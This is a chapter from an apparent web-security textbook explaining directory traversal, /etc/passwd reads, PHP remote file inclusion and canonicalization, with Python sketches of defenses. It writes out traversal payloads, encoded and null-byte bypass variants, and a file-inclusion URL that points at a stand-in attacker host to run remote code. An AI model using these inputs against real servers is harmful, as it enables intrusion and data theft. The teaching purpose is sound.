Directory Traversal


Virtually every web application attack works on a premise of “tricking” the web application into performing an action that the attacker is unable to directly perform himself. An attacker can’t normally directly access an application’s database, but he can trick the web application into doing it for him through SQL injection attacks. He can’t normally access other users’ accounts, but he can trick the web application into doing it for him through cross-site scripting attacks. And he can’t normally access the file system on a web application server, but he can trick the application into doing it for him through directory traversal attacks. To show an example of directory traversal, let’s return one more time to Dave’s photo gallery site.

The main page for www.photos.cxx where users go to see Dave’s pictures is the page view_photo.php. The particular picture that gets displayed to the user is passed in the URL parameter “picfile,” like this: www.photos.cxx/view_photo.php?picfile=mt_rainier.jpg. Normally a user wouldn’t type this address in himself; he would just follow a link from the main gallery page that points to this address.

An attacker may be able to manually change the picfile parameter to manipulate the web application into opening and displaying files outside its normal image file directory, like this: http://www.photos.cxx/view_photo.php?picfile=../private/cancun.jpg. This is called a directory traversal or path traversal attack. In this case, the attacker is attempting to break out of the internal folder where Dave keeps his photos and into a guessed “private” folder. The “../” prefix is a file system directive to “go up” one folder, so the folder “images/public/../private” is really the same folder as “images/private.” This is why you’ll occasionally hear directory traversal attacks called “dot-dot-slash” attacks.
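To see how the “../” directive collapses, here is a minimal Python sketch. It assumes the application simply joins the picfile value onto the folder “images/public” from the example above; the function name and the choice of Python rather than Dave’s PHP are mine, purely for illustration.

```python
import posixpath

# Folder the application is assumed to prepend to the picfile value.
IMAGE_DIR = "images/public"

def resolved_path(picfile):
    """Join the user-supplied name onto the image folder and collapse any "../" segments."""
    return posixpath.normpath(posixpath.join(IMAGE_DIR, picfile))

print(resolved_path("mt_rainier.jpg"))         # images/public/mt_rainier.jpg
print(resolved_path("../private/cancun.jpg"))  # images/private/cancun.jpg
```

The second request never names “images/private” directly, yet that is where it ends up.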

Directory traversal attacks are similar to forceful browsing in that the attacker is attempting to break out of the intended scope of the application and access files he’s not supposed to be able to. In fact, some web application security experts consider directory traversal to be another subcategory of forceful browsing attacks like filename guessing or directory enumeration.

IMHO

If you want to think of directory traversal attacks this way, I think that’s fine, but personally I think there’s a big enough distinction between them based on the fact that forceful browsing issues are generally web server issues that can be mitigated through appropriate web server configuration; while directory traversal attacks are generally web application issues that need to be fixed through application code changes.

Applications may also be vulnerable to directory traversal through attacks that encode the directory escape directive. Instead of trying the attack string “../private/cancun.jpg,” an attacker might try the URL-encoded (percent-encoded) variation “%2E%2E%2Fprivate%2Fcancun%2Ejpg.” This is a type of canonicalization attack (trying an alternative but equivalent name for the targeted resource), and we’ll cover these attacks in more detail later in this chapter.
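The following Python sketch shows why the encoded form matters. The filter function is hypothetical, a stand-in for any check that looks for the literal text “../” before the value has been decoded.

```python
from urllib.parse import unquote

encoded = "%2E%2E%2Fprivate%2Fcancun%2Ejpg"
decoded = unquote(encoded)
print(decoded)  # ../private/cancun.jpg

def naive_filter_blocks(value):
    """Hypothetical filter: flag a value only if it contains the literal text "../"."""
    return "../" in value

print(naive_filter_blocks(encoded))  # False: the encoded form slips past the check
print(naive_filter_blocks(decoded))  # True: the same value is caught once decoded
```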

etc/passwd

The classic example of a directory traversal attack is an attempt to read the /etc/passwd user information file. The /etc/passwd file is found on some Unix-based operating systems and contains a list of all users on the system, along with their names, e-mail addresses, phone numbers, and physical locations: a gold mine of data for a potential attacker.

Note

Even though its name implies otherwise, in modern systems /etc/passwd does not actually contain a list of users’ passwords. Early versions of Unix did work this way, but now passwords are kept in a separate, more secure file only accessible by the system root user.

One especially nice thing about /etc/passwd (from an attacker’s perspective) is not just that it has a lot of really interesting and potentially valuable data; it’s that there’s no guessing involved as to where the file is located on the server. It’s always the file “passwd” located in the directory “etc.” Retrieving this file (or any other standard system file always located in the same place) is a lot simpler than trying to blindly guess at files or directories that may not actually exist. The only question is, how far back in the directory structure is it? It may be 1 folder back: http://www.photos.cxx/view_photo.php?picfile=../etc/passwd; or it may be 2 folders back: http://www.photos.cxx/view_photo.php?picfile=../../etc/passwd; or it may be 20 folders back. But even if it is 20 folders back, that’s still a lot fewer guesses than an attacker would need to find something like www.photos.cxx/view_photo.php?picfile=../private/cancun.jpg.
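A short Python sketch makes the depth question concrete. The server-side folder “/var/www/photos/images/public” is a made-up assumption (an attacker would not know it), and the sketch only resolves path strings; it does not touch any files. Notice that once the path reaches the root, extra “../” segments change nothing, because on Unix-like systems the parent of the root directory is the root itself.

```python
import posixpath

# Hypothetical location of the image folder on the server; the real depth is unknown to the attacker.
IMAGE_DIR = "/var/www/photos/images/public"

def resolved_path(picfile):
    """Join the user-supplied name onto the image folder and collapse any "../" segments."""
    return posixpath.normpath(posixpath.join(IMAGE_DIR, picfile))

for depth in (1, 2, 5, 20):
    picfile = "../" * depth + "etc/passwd"
    print(depth, resolved_path(picfile))
# 1 /var/www/photos/images/etc/passwd
# 2 /var/www/photos/etc/passwd
# 5 /etc/passwd
# 20 /etc/passwd
```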

More Directory Traversal Vulnerabilities

Even though it’s bad enough that attackers can exploit directory traversal vulnerabilities to read other users’ confidential data and sensitive system files, there are other possibilities that may be even worse. Imagine what might happen if your web application opened a user-specified file in read-write mode instead of just read-only mode; for example, if you allowed the user to specify the location of a log file or user profile file. An attacker could then overwrite system files, either to crash the system entirely (causing a denial-of-service attack) or in a more subtle attack, to inject his own data. If he could make changes to /etc/passwd, he might be able to add himself as a full-fledged system user. If he could determine the location of the application’s database (for instance, if the database connection string were accidentally leaked in a code comment as discussed earlier), then he could make changes to the database directly without having to mess around with complex SQL injection attacks. The possibilities are almost endless.

This attack isn’t as farfetched as it might seem, especially if you consider that a web application might easily look for a user profile filename in a cookie and not necessarily in the URL query string.

Tip

Always remember that every part of an HTTP request, including the URL query string, the request body text, headers, and cookies can all be changed by an attacker with an HTTP proxy tool.

File Inclusion Attacks

One exceptionally nasty variant of directory traversal is the file inclusion attack. In this attack, the attacker is able to specify a file to be included as part of the target page’s server-side code. This vulnerability is most often seen in PHP code that uses the “include” or “require” functions, but it’s possible to have the same issue in many different languages and frameworks. Here’s an example of some vulnerable code.

Dave is having great success with the new print purchase feature of his photo gallery application (with the exception of a few security breaches that he’s trying to take care of). In order to better serve his customers who are visiting his site with iPhones and Androids, he adds two radio buttons to the main page to allow the user to choose between the full-fledged regular high-bandwidth user interface, or a simpler reduced-bandwidth interface.

In the PHP code, Dave gets the incoming value of the “layout” parameter and then loads that file into the page in order to execute that code and change the page’s layout behavior.

Of course this code is vulnerable to the same directory traversal attacks we’ve already discussed; an attacker could make a request for this page with the “layout” parameter set to ../../etc/passwd or any other system file. But there’s a much more serious possibility too. Instead of loading in system files, an attacker could specify his own PHP code from his own server by setting the layout parameter to http://evilsite.cxx/exploit.php. The server would then fetch this code and execute it. If this happens, the attacker would have complete control over the web server just as if he were one of the legitimate developers of the web site.

Into Action

It’s best to avoid including source code files based on user-specified filenames. If you must, try hard-coding a specific list of possibilities and letting users select by index rather than name, just as we did to avoid the insecure direct object reference vulnerabilities we discussed in Chapter 7. So in this case, Dave would have been better off setting his radio button values to “0” and “1” (or something like that) and then writing PHP to load either “standard.php” when layout is equal to 0 or “simple.php” when layout is equal to 1.
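Here is a minimal sketch of the select-by-index idea, written in Python rather than PHP for illustration. The two file names come from the text; the function name and the choice to fall back to the standard layout on bad input are my own assumptions.

```python
# File names taken from the text; the tuple order defines the index the radio buttons submit.
LAYOUT_FILES = ("standard.php", "simple.php")

def layout_file_for(raw_value):
    """Map the submitted "layout" value ("0" or "1") to a hard-coded file name.

    Anything that is not a valid index falls back to the standard layout
    (an assumed policy; rejecting the request outright would also work).
    """
    try:
        index = int(raw_value)
    except (TypeError, ValueError):
        index = 0
    if not 0 <= index < len(LAYOUT_FILES):
        index = 0
    return LAYOUT_FILES[index]

print(layout_file_for("1"))                               # simple.php
print(layout_file_for("../../etc/passwd"))                # standard.php
print(layout_file_for("http://evilsite.cxx/exploit.php")) # standard.php
```

Because the user’s input is only ever used as a number, no filename or URL the attacker supplies can reach the code that loads the file.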

If that’s not an option for you, you’ll need to canonicalize the filename value and test it before loading that resource. (We’ll talk about how to do this next.) If you’re using PHP, you should also set the allow_url_fopen configuration setting to “Off,” which prohibits the application from loading external resources with the include or require functions. (In PHP 5.2 and later, the separate allow_url_include setting controls remote includes specifically and is “Off” by default; leave it that way.)

Canonicalization

You like potato, and I like potahto
You like tomato, and I like tomahto
Potato, potahto, tomato, tomahto
Let’s call the whole thing off.
—Louis Armstrong

Human beings often have many different ways of referring to the exact same object. What I call an “elevator,” my British friend Mark might call a “lift.” What a botanist calls a “Narcissus papyraceus” I call a “daffodil,” and my wife Amy (having been raised in the South) calls a “jonquil.” (Our cat calls them delicious, as he does with all our other house plants.)

Web servers also often have many different ways of referring to the exact same file. To Dave’s photo gallery application, the page “http://www.photos.cxx/myfavoritepictures.html” is the same page as “http://www.photos.cxx/MYFAVORITEPICTURES.html” and the same page as “http://www.photos.cxx/My%20Favorite%20Pictures.html” too. It might also be “http://192.168.126.1/myfavoritepictures.html,” “./my favorite pictures.html,” or “c:\inetpub\wwwroot\photos\myfavo~1.htm.” If we were to list out all the possible combinations of encodings, domain addresses, relative/absolute paths, and capitalization, there would probably be tens if not hundreds of thousands of different ways to refer to this one single file. Figure 8-9 shows an example of just a few of these possibilities, all pointing to the same file on the server.

Figure 8-9 Different filenames all resolving to the same file on the web server

What this means for us in terms of directory traversal attacks is that it’s pretty much impossible to prevent directory traversal attacks by testing for specific banned files or directories (also called blacklist testing). If you check to make sure the user isn’t trying to load “../etc/passwd”, that still means he can load “../ETC/PASSWD” or “../folder/../etc/passwd” or “../etc/passwd%00” or many other variations that end up at the exact same file. Even checking to see whether the filename starts with “../” won’t work; maybe the attacker will just specify an absolute filename instead of a relative one.
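The weakness of blacklist testing is easy to demonstrate. In this Python sketch, the banned list, the function names, and the base folder “/images” are all hypothetical; the point is only that several different strings pass the check and still resolve to the same file.

```python
import posixpath

# Hypothetical blacklist containing the one string the developer thought of.
BANNED = ("../etc/passwd",)

def blacklist_allows(picfile):
    """Naive check: reject only exact matches against the banned list."""
    return picfile not in BANNED

def resolved_path(picfile, base="/images"):
    """Where the request ends up if the value is joined onto the (assumed) base folder."""
    return posixpath.normpath(posixpath.join(base, picfile))

for attempt in ("../etc/passwd", "../folder/../etc/passwd", "/etc/passwd"):
    print(attempt, blacklist_allows(attempt), resolved_path(attempt))
# ../etc/passwd False /etc/passwd
# ../folder/../etc/passwd True /etc/passwd
# /etc/passwd True /etc/passwd
```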

The solution to the problem is to canonicalize the input value (that is, reduce it to a standard value) before testing it. The canonical representation of “http://www.photos.cxx/MyFavoritePictures.html” and “http://192.168.126.1/my%20favorite%20pictures.html” and all other possible variants of encodings and capitalizations and domain addresses might resolve to one single standard value of “http://www.photos.cxx/myfavoritepictures.html.” Only once a value has been properly canonicalized can you test it for correctness.

Tip

Canonicalization is tricky, so don’t try to come up with your own procedure for it. Use the built-in canonicalization functions provided by your application language and framework.
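As one possible illustration of canonicalize-then-test, here is a Python sketch that leans on the standard library’s os.path.realpath and os.path.commonpath. The function name resolve_inside and the folder layout are assumptions of mine, and the sketch assumes the web framework has already URL-decoded the value; treat it as a starting point rather than a complete defense.

```python
import os
import tempfile

def resolve_inside(base_dir, user_value):
    """Canonicalize user_value relative to base_dir and refuse anything outside it."""
    base = os.path.realpath(base_dir)
    # realpath collapses "../" segments and follows symbolic links; an absolute
    # user_value replaces the base entirely when joined, and is caught below.
    candidate = os.path.realpath(os.path.join(base, user_value))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("path escapes the allowed directory")
    return candidate

# Demonstration against a throwaway folder standing in for Dave's image directory.
with tempfile.TemporaryDirectory() as root:
    public = os.path.join(root, "images", "public")
    os.makedirs(public)
    print(resolve_inside(public, "mt_rainier.jpg"))
    for attempt in ("../private/cancun.jpg", "../../../etc/passwd", "/etc/passwd"):
        try:
            resolve_inside(public, attempt)
        except ValueError:
            print("rejected:", attempt)
```

Comparing whole path components with commonpath, rather than checking whether one string starts with another, also rejects a sibling folder such as “images/public_old” that merely shares a prefix with the allowed one.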

We’ve Covered

Keeping your source code secret

The difference between static and dynamic web content

The difference between interpreted and compiled source code

Backup file leakage and include file leakage

Keeping secrets out of publicly visible comments

Keeping sensitive functionality on the server tier

Security through obscurity

Obscuring information or functionality can enhance security

Never rely on obscurity alone

Forceful browsing

Guessed files and folders

Insecure direct object references

Directory enumeration

HTTP status code information leakage

Directory traversal

Reading sensitive data: /etc/passwd

Writing to unauthorized files

PHP file inclusion

Canonicalization
